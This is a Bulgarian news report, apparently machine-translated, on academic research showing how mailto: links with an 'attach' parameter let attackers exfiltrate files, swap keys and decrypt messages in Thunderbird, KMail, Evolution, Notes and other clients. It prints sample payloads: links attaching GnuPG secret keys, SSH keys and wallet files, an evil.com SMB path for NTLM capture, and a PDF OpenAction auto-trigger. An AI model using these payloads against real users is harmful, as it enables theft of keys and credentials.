Атакуване на потребители на имейл клиент чрез връзки „mailto:“.

Изследователи от Рурския университет в Бохум (Германия) анализирани (PDF) поведение на пощенски клиенти при обработка на връзки „mailto:“ с разширени параметри. Пет от двадесетте изследвани имейл клиента бяха уязвими на атака, която манипулира подмяната на ресурс с помощта на параметъра „прикачване“. Допълнителни шест имейл клиента бяха уязвими на атака за подмяна на PGP и S/MIME ключ, а три клиента бяха уязвими на атака за извличане на съдържанието на криптирани съобщения.

Връзки «mailto:"се използват за автоматизиране на отварянето на имейл клиент с цел написване на писмо до адресата, посочен в линка. В допълнение към адреса можете да посочите допълнителни параметри като част от връзката, като тема на писмото и шаблон за типично съдържание. Предложената атака манипулира параметъра „прикачване“, който ви позволява да прикачите прикачен файл към генерираното съобщение.

Пощенските клиенти Thunderbird, GNOME Evolution (CVE-2020-11879), KDE KMail (CVE-2020-11880), IBM/HCL Notes (CVE-2020-4089) и Pegasus Mail бяха уязвими на тривиална атака, която ви позволява автоматично да прикачвате всеки локален файл, посочен чрез връзка като „mailto:?attach=path_to_file“. Файлът е прикачен без показване на предупреждение, така че без специално внимание потребителят може да не забележи, че писмото ще бъде изпратено с прикачен файл.

Например, като използвате връзка като „mailto:[имейл защитен]&subject=Title&body=Text&attach=~/.gnupg/secring.gpg" можете да вмъкнете лични ключове от GnuPG в писмото. Можете също да изпратите съдържанието на крипто портфейли (~/.bitcoin/wallet.dat), SSH ключове (~/.ssh/id_rsa) и всички файлове, достъпни за потребителя. Освен това Thunderbird ви позволява да прикачвате групи от файлове по маска, като използвате конструкции като „attach=/tmp/*.txt“.

В допълнение към локалните файлове, някои имейл клиенти обработват връзки към мрежово хранилище и пътища в IMAP сървъра. По-специално, IBM Notes ви позволява да прехвърлите файл от мрежова директория, когато обработвате връзки като „attach=\\evil.com\dummyfile“, както и да прихващате NTLM параметри за удостоверяване чрез изпращане на връзка към SMB сървър, контролиран от нападателя (заявката ще бъде изпратена с текущия потребител на параметрите за удостоверяване).

Thunderbird успешно обработва заявки като “attach=imap:///fetch>UID>/INBOX>1/”, които ви позволяват да прикачвате съдържание от папки на IMAP сървъра. В същото време съобщенията, извлечени от IMAP, криптирани чрез OpenPGP и S/MIME, се дешифрират автоматично от пощенския клиент преди изпращане. Разработчиците на Thunderbird бяха уведомен за проблема през февруари и в бр Thunderbird 78 проблемът вече е отстранен (клонове 52, 60 и 68 на Thunderbird остават уязвими).

Старите версии на Thunderbird също бяха уязвими към два други варианта на атака на PGP и S/MIME, предложени от изследователите. По-специално, Thunderbird, както и OutLook, PostBox, eM Client, MailMate и R2Mail2, бяха обект на атака за подмяна на ключ, причинена от факта, че пощенският клиент автоматично импортира и инсталира нови сертификати, предавани в S/MIME съобщения, което позволява нападателят да организира подмяна на вече съхранени от потребителя публични ключове.

Втората атака, на която са податливи Thunderbird, PostBox и MailMate, манипулира характеристиките на механизма за автоматично запазване на чернови на съобщения и позволява, използвайки параметри на mailto, да инициира декриптиране на криптирани съобщения или добавяне на цифров подпис за произволни съобщения, с последващо предаване на резултата към IMAP сървъра на нападателя. При тази атака шифрованият текст се предава чрез параметъра „тяло“, а тагът „мета опресняване“ се използва за иницииране на повикване към IMAP сървъра на атакуващия. Например: ' '

За автоматично обработване на връзки „mailto:“ без намеса на потребителя могат да се използват специално проектирани PDF документи - действието OpenAction в PDF ви позволява автоматично да стартирате манипулатора на mailto при отваряне на документ:

%PDF-1.5
1 0 об
<< /Тип /Каталог /OpenAction [2 0 R] >>
endobj

2 0 об
<< /Тип /Действие /S /URI/URI (mailto:?body=——НАЧАЛО НА PGP СЪОБЩЕНИЕ——[…])>>
endobj

Източник: opennet.ru